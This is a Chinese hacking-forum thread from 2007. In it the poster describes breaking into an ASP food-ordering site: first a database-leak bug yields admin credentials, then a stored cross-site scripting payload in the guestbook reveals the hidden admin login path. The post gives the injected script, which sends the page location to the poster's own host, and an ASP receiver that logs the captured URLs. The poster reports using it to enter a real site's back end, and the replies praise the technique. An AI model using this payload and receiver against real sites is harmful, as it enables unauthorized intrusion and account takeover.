找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 2875|回复: 5

通过跨站漏洞获取到后台路径

[复制链接]

18

主题

54

回帖

97

牛毛

初生牛犊

等待 等待 等待 等待 .........

积分
97
发表于 2007-12-10 17:31:03 | 显示全部楼层 来自 北京市
漂亮的思路

18

主题

41

回帖

81

牛毛

初生牛犊

积分
81
发表于 2007-12-12 00:28:59 | 显示全部楼层 来自 广东省深圳市
确实不错的方法 。。又学了一条

3

主题

29

回帖

44

牛毛

初生牛犊

积分
44
发表于 2007-12-31 16:51:44 | 显示全部楼层 来自 湖南省湘潭市湘乡市
不懂

17

主题

157

回帖

238

牛毛

一级牛人

不要和我比懒,因为我懒的和你比

积分
238
发表于 2008-3-23 12:48:57 | 显示全部楼层 来自 江西省南昌市
这个思路确实不错.....

70

主题

670

回帖

997

牛毛

一级牛人

__怎麼开鈊...怎麼过┌

积分
997
发表于 2008-4-1 22:19:38 | 显示全部楼层 来自 辽宁省丹东市
LZ的脚本入侵技术不错啊

105

主题

835

回帖

2157

牛毛

二级牛人

积分
3574
 楼主| 发表于 2007-12-10 17:26:11 | 显示全部楼层 |阅读模式 来自 江苏省南京市
序:这个是几个月前搞的,今天翻电脑看到顺便整理一下发上来。几个月前,工作原因需要一个asp网上订餐系统,好不容易找到个编写很不错的,但官网只能下载到演示版,看了一下居然还有低级的爆库漏洞。找到此系统在北航试点的一个站,轻松获取了帐号密码,但问题是死活找不到后台管理登陆地址。入侵网站时经常出现过这种问题,这种情况很郁闷。在看了一下,发现该站留言本过滤不严可以跨站,于是一条获取后台路径的思路出现了:

原理:很简单,写入一个特殊js留言,获取到当前路径(访问到这条留言的一般只有两个地方:留言本本身页面和后台管理页面)并以此为参数发送到自己站点的asp页面,后者通过fso将所获取的路径记录到文本里。

条件:一个支持fso的asp空间

例:对方留言本地址:http://www.abc.com/guestbook.asp
    自己空间地址:http://www.123.com

步骤1:在对方留言本中插入:
<script>window.open(\"http://www.123.com/url.asp?url=\"+self.location)</script>

步骤2:在自己空间根目录下上传一个文件 url.asp
代码如下:
<%
url=request(\"url\")
if url<>\"http://www.abc.com/guestbook.asp\" then
&#39;这里网址为对方留言本地址,当留言本页面访问时也会提交记录,所以屏蔽掉提交的留言本地址
str=Request.ServerVariables(\"PATH_TRANSLATED\")
&#39;取出目前执行程序所在的实际路径及文件名称
nIndex = InStrRev(str,\"\\\")
&#39;取得最后一个“\\”的位置
If (nIndex >0) Then
PathInfo = Left(str,nIndex)
&#39;确定生成文件的存放路径
End If
filename = PathInfo & \"fso.txt\"
&#39;设置文件的实际存放路径以及文件名称
Set fso = CreateObject(\"Scripting.FileSystemObject\")
&#39;使用 Server.CreateObject创建 FSO对象模式
Set newfile = fso.OpenTextFile(filename,3, True)
&#39;opentextfile第二个参数为1,代表读;为2,代表写;为8,代表追加
newfile.writeLine (url)
&#39;将获取的内容写入生成文件
Set fso = Nothing
&#39;释放创建的对象
newfile.close
end if
%>
<script>window.opener=null;window.close();</script>
<!--关闭当前页面-->

代码中附带了讲解,稍微接触到一点代码语言的都能看懂。

步骤3:等待。等到管理员通过管理后台登陆时,即可得到后台路径,由于session验证失败此路径一般都跳转到后台登陆地址。

后记:前面所说的那个网站,我通过此法成功进入后台。本文只是跨站利用思路之一,还有许多可利用之处就靠大家自己琢磨了。防范也很简单,只要注意字符过滤就行了。
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-26 07:16 , Processed in 0.147883 second(s), 39 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表